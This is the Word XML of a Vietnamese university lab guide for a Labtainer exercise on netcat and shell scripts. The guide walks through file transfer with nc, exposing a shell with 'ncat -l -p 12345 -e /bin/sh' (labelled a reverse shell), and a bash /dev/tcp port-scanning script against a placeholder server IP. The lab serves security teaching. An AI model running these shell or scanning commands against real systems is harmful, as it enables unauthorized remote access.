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5DFD" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="006614B6" w:rsidRDefault="0089393B" w:rsidP="0089393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784B8195" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="006614B6" w:rsidRDefault="0089393B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 Mục đích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B726B2" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="006614B6" w:rsidRDefault="0089393B" w:rsidP="0089393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hiểu về các kỹ thuật tấn công sử dụng một số công cụ như netcat và shell script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24542DFE" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="006614B6" w:rsidRDefault="0089393B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4C752D02" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="006614B6" w:rsidRDefault="0089393B" w:rsidP="0089393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hệ điều hành Linux, mô hình mạng khách/chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C875C" w14:textId="2BBF9918" w:rsidR="0089393B" w:rsidRPr="006614B6" w:rsidRDefault="0089393B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7060E9F5" w14:textId="77777777" w:rsidR="001C6F62" w:rsidRPr="006614B6" w:rsidRDefault="001C6F62" w:rsidP="0089393B">
      <w:pPr>
        <w:spacing w:after="0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39D79D49" w14:textId="239CB470" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khởi Động Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB9D948" w14:textId="152271B2" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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Chạy:</w:t>
      </w:r>
      <w:r w:rsidRPr="006614B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> labtainer</w:t>
      </w:r>
      <w:r w:rsidRPr="006614B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ptit-netcat-shellscript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D157E1" w14:textId="2B493DEE" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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Nhập mã sinh viên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75251978" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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2 terminal xuất hiện: client, server (cùng mạng LAN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4EFC6B" w14:textId="686CA6D6" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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0365709" w14:textId="65707C20" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Task 1: Chuyển Fil</w:t>
      </w:r>
      <w:r w:rsidRPr="006614B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0FB5B6A9" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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client, tạo file sendfile.txt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492D2253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echo -n "My string is: $(head -c 20 /dev/urandom | base64)" &gt; sendfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A9514" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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server, mở Netcat lắng nghe cổng 12345:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568612AE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05878248"/>
      <w:r w:rsidRPr="006614B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc -l -p 12345 &gt; receive.txt</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="7087850F" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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client, gửi file tới server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A088737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nc &lt;IP server&gt; 12345 &lt; sendfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437F8B5" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B6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(Thay &lt;IP server&gt; bằng IP thực tế, check bằng ip addr trên server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024D2CA5" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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server, kiểm tra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B67734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cat receive.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5283C5" w14:textId="29F004BC" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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E96004C" w14:textId="6C11517A" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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2: Thiết Lập Reverse Shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B963461" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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server, mở Ncat thực thi shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C646619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lastRenderedPageBreak/>
        <w:t>ncat -l -p 12345 -e /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ADA679" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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client, kết nối tới server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD83E2F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nc &lt;IP server&gt; 12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D65CD3" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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Trong kết nối, chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB3FCFE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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FD7D4E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ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEC45A1" w14:textId="6F6F9500" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B6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Quét Cổng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79382ACB" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614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Trên client, tạo file ports.txt chứa cổng 22:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACEB0F1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touch ports.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66670FD9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echo "22" &gt; ports.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD7F33E" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614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Tạo script scanning.sh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B4B37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nano scanning.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A177F1" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B6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Nội dung:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E830ECD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14:paraId="24DB956F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server_ip="&lt;IP server&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17007754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while read port; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE873E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 xml:space="preserve">    (echo &gt; /dev/tcp/$server_ip/$port) 2&gt;/dev/null &amp;&amp; echo "Port $port is open" || echo "Port $port is closed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E0F3FA" w14:textId="2653D9F8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done &lt; ports.txt &gt; result.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440CE706" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B6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(Thay &lt;IP server&gt; bằng IP thực tế).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07AAA5" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614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Cấp quyền và chạy script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A5122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chmod +x scanning.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D777359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./scanning.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A90E9B0" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B6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Kiểm tra kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1461BBF0" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="00661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cat result.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B80AF6" w14:textId="24B64209" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B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6895F34" w14:textId="77777777" w:rsidR="006614B6" w:rsidRPr="006614B6" w:rsidRDefault="006614B6" w:rsidP="006614B6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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kết Thúc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139722EC" w14:textId="48FE5ED0" w:rsidR="009029ED" w:rsidRPr="008E71CE" w:rsidRDefault="006614B6" w:rsidP="008E71C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614B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Chạy: stoplab ptit-netcat-shellscript</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009029ED" w:rsidRPr="008E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EBC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="531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4996"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64C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F4C29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBB6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A51D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="382C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F5DE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8282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97874"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9AF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2151B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB4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15C72"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC5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53084"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD9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118CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="464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A06DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA2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60042"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="316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1F2F19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08F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A"/>
    <w:rsid w:val="001C6F62"/>
    <w:rsid w:val="0023739A"/>
    <w:rsid w:val="006614B6"/>
    <w:rsid w:val="0089393B"/>
    <w:rsid w:val="008E71CE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D96E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{98086AA6-74EE-43DF-AD81-67116D80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4B6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14B6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93B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0089393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614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14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sm">
    <w:name w:val="text-sm"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006614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1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2025-08-03T14:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-12T01:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>